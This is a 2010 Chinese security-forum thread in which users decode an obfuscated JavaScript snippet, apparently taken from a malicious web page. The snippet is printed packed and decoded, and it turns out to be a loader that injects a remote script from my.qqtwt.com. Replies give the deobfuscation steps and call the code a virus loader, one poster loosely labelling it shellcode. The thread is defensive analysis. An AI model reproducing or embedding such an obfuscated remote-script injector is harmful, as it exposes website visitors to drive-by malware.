求解这段加密代码 - 瑞星卡卡安全论坛bbs.ikaka.com

瑞星卡卡安全论坛技术交流区 恶意网站交流求解这段加密代码

	瑞星ESM助力北京石龙医院筑牢安全防线		瑞星恶意代码管理系统助金华电力提升防御能力		俄乌冲突加剧网络攻击风险白俄罗斯政府遭APT攻击		助力国家网络安全瑞星获病毒应急处理中心感谢信
	实力拉满瑞星第四十四次通过VB100测评		瑞星发布2024年六大网络安全趋势		瑞星携手中国农业大学共筑网络安全防线		人工智能在网络安全领域的风险和机遇

12

1 / 2 页

跳转页

[求助] 求解这段加密代码

本主题由版主 networkedition 于 2010-2-1 9:52:12 执行关闭主题/取消操作

sweay 初生襁褓狮帖子:5 注册: 2010-01-29 来自:	发表于： 2010-01-29 16:49 \| 只看楼主短消息资料字号：小中大 1楼求解这段加密代码 <script language="javascript" type="text/javascript">eval(function(p,a,c,h,e,i){e=function(c){return c};if(!''.replace(/^/,String)){while(c--)i[c]=h[c]\|\|c;h=[function(e){return i[e]}];e=function(){return'\\w+'};c=1};while(c--)if(h[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),h[c]);return p}('30["\\29\\15\\4\\20\\10\\7\\21\\0"]["\\16\\5\\3\\0\\7"]("\\13\\6\\4\\5\\3\\2\\0 \\28\\1\\21\\19\\20\\1\\19\\7\\11\\"\\27\\1\\18\\1\\26\\4\\5\\3\\2\\0\\" \\0\\17\\2\\7\\11\\"\\0\\7\\14\\0\\/\\25\\1\\18\\1\\6\\4\\5\\3\\2\\0\\" \\6\\5\\4\\11\\"\\24\\0\\0\\2\\23\\/\\/\\10\\17\\8\\9\\9\\0\\16\\0\\8\\4\\15\\10\\/\\9\\3\\1"+"\\22\\3\\8\\1\\6\\2\\14\\"\\12\\13\\/\\6\\4\\5\\3\\2\\0\\12");',10,31,'x74\|x61\|x70\|x69\|x63\|x72\|x73\|x65\|x2e\|x71\|x6d\|x3d\|x3e\|x3c\|x78\|x6f\|x77\|x79\|x76\|x67\|x75\|x6e\|x62\|x3a\|x68\|x6a\|x53\|x4a\|x6c\|x64\|window'.split('\|'),0,{}));</script> networkedition 最后编辑于 2010-01-29 17:28:06
sweay 初生襁褓狮帖子:5 注册: 2010-01-29 来自:	分享到：

fengxingjudy 快乐黄口狮帖子:184 注册: 2010-01-12 来自:	发表于： 2010-01-29 16:58 \| 短消息资料字号：小中大 2楼回复：求解这段加密代码 <script language="JavaScript" type="text\/javascript" src="http://my.qqtwt.com/qiabi.aspx"></script>
fengxingjudy 快乐黄口狮帖子:184 注册: 2010-01-12 来自:

Dmlt 初生襁褓狮帖子:3 注册: 2010-01-29 来自:	发表于： 2010-01-29 16:58 \| 短消息资料字号：小中大 3楼回复：求解这段加密代码能不能说下解密方法??
Dmlt 初生襁褓狮帖子:3 注册: 2010-01-29 来自:

leo108 反毒学员帖子:648 注册: 2010-01-11 来自:	发表于： 2010-01-29 17:08 \| 短消息资料字号：小中大 4楼回复：求解这段加密代码首先，把eval(function替换成document.write(function 保存成网页，打开，得到代码 window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]("\x3c\x73\x63\x72\x69\x70\x74 \x6c\x61\x6e\x67\x75\x61\x67\x65\x3d\"\x4a\x61\x76\x61\x53\x63\x72\x69\x70\x74\" \x74\x79\x70\x65\x3d\"\x74\x65\x78\x74\/\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\" \x73\x72\x63\x3d\"\x68\x74\x74\x70\x3a\/\/\x6d\x79\x2e\x71\x71\x74\x77\x74\x2e\x63\x6f\x6d\/\x71\x69\x61"+"\x62\x69\x2e\x61\x73\x70\x78\"\x3e\x3c\/\x73\x63\x72\x69\x70\x74\x3e"); 然后在下面代码空白处贴上上面的代码 <script> alert(' ') </script> 保存为网页，打开之后就得到解密代码
leo108 反毒学员帖子:648 注册: 2010-01-11 来自:

sweay 初生襁褓狮帖子:5 注册: 2010-01-29 来自:	发表于： 2010-01-29 17:08 \| 只看楼主短消息资料字号：小中大 5楼回复：求解这段加密代码初步解出是 window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]("\x3c\x73\x63\x72\x69\x70\x74 \x6c\x61\x6e\x67\x75\x61\x67\x65\x3d\"\x4a\x61\x76\x61\x53\x63\x72\x69\x70\x74\" \x74\x79\x70\x65\x3d\"\x74\x65\x78\x74\/\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\" \x73\x72\x63\x3d\"\x68\x74\x74\x70\x3a\/\/\x6d\x79\x2e\x71\x71\x74\x77\x74\x2e\x63\x6f\x6d\/\x71\x69\x61"+"\x62\x69\x2e\x61\x73\x70\x78\"\x3e\x3c\/\x73\x63\x72\x69\x70\x74\x3e"); 16进制的 document.write
sweay 初生襁褓狮帖子:5 注册: 2010-01-29 来自:

送你回城卷初生襁褓狮帖子:7 注册: 2007-03-01 来自:	发表于： 2010-01-29 17:21 \| 短消息资料字号：小中大 6楼回复：求解这段加密代码 http://www.521yy.com/%E7%AB%99%E9%95%BF%E5%B7%A5%E5%85%B7/ 加密解密工具 networkedition 最后编辑于 2010-01-29 17:27:22
送你回城卷初生襁褓狮帖子:7 注册: 2007-03-01 来自:

ty88 卡卡反病毒小组帖子:979 注册: 2007-07-12 来自:	发表于： 2010-01-29 18:42 \| 短消息资料字号：小中大 7楼回复: 求解这段加密代码 1.jpg (125.81 K) 2010-1-29 18:42:14 执行EVAL清除即可
ty88 卡卡反病毒小组帖子:979 注册: 2007-07-12 来自:

暗夜的雪飘泊而立狮帖子:638 注册: 2009-12-24 来自:娘胎	发表于： 2010-01-30 13:11 \| 短消息资料字号：小中大 8楼回复：求解这段加密代码 window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]("\x3c\x73\x63\x72\x69\x70\x74 \x6c\x61\x6e\x67\x75\x61\x67\x65\x3d\"\x4a\x61\x76\x61\x53\x63\x72\x69\x70\x74\" \x74\x79\x70\x65\x3d\"\x74\x65\x78\x74\/\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\" \x73\x72\x63\x3d\"\x68\x74\x74\x70\x3a\/\/\x6d\x79\x2e\x71\x71\x74\x77\x74\x2e\x63\x6f\x6d\/\x71\x69\x61"+"\x62\x69\x2e\x61\x73\x70\x78\"\x3e\x3c\/\x73\x63\x72\x69\x70\x74\x3e"); 个人认为这段代码属于Shallcode 利用FreShow解密工具替换掉\x为%u 再用两次ESC解密。。不过好像最后也没什么结果娱乐致死还是娱乐至死啊？
暗夜的雪飘泊而立狮帖子:638 注册: 2009-12-24 来自:娘胎

暗夜的雪飘泊而立狮帖子:638 注册: 2009-12-24 来自:娘胎	发表于： 2010-01-30 13:18 \| 短消息资料字号：小中大 9楼回复: 求解这段加密代码 window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]("\x3c\x73\x63\x72\x69\x70\x74 \x6c\x61\x6e\x67\x75\x61\x67\x65\x3d\"\x4a\x61\x76\x61\x53\x63\x72\x69\x70\x74\" \x74\x79\x70\x65\x3d\"\x74\x65\x78\x74\/\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\" \x73\x72\x63\x3d\"\x68\x74\x74\x70\x3a\/\/\x6d\x79\x2e\x71\x71\x74\x77\x74\x2e\x63\x6f\x6d\/\x71\x69\x61"+"\x62\x69\x2e\x61\x73\x70\x78\"\x3e\x3c\/\x73\x63\x72\x69\x70\x74\x3e"); 经过进一步解码，发现不用替换掉 “\x “ 了，因为已经通过前一步骤解出了一遍，直接把这段代码放到FreShow里面，用ESC解密即可得到如下代码： window["document"]["write"]("<script language="JavaScript" type="text/javascript" src="http://my.qqtwt.com/qia"+"bi.aspx"></script>"); 上面就该是病毒程序了。。。的确是一段ShallCode。。。附件是FreShow界面~ 不知道怎么加图片呵呵小白了~ 娱乐致死还是娱乐至死啊？
暗夜的雪飘泊而立狮帖子:638 注册: 2009-12-24 来自:娘胎

sweay 初生襁褓狮帖子:5 注册: 2010-01-29 来自:	发表于： 2010-01-30 16:51 \| 只看楼主短消息资料字号：小中大 10楼回复：求解这段加密代码谢谢各位热心解答。非常感谢学习到了很多
sweay 初生襁褓狮帖子:5 注册: 2010-01-29 来自:

<<上一主题|下一主题>>

12

1 / 2 页

跳转页

页面顶部

Powered by Discuz!NT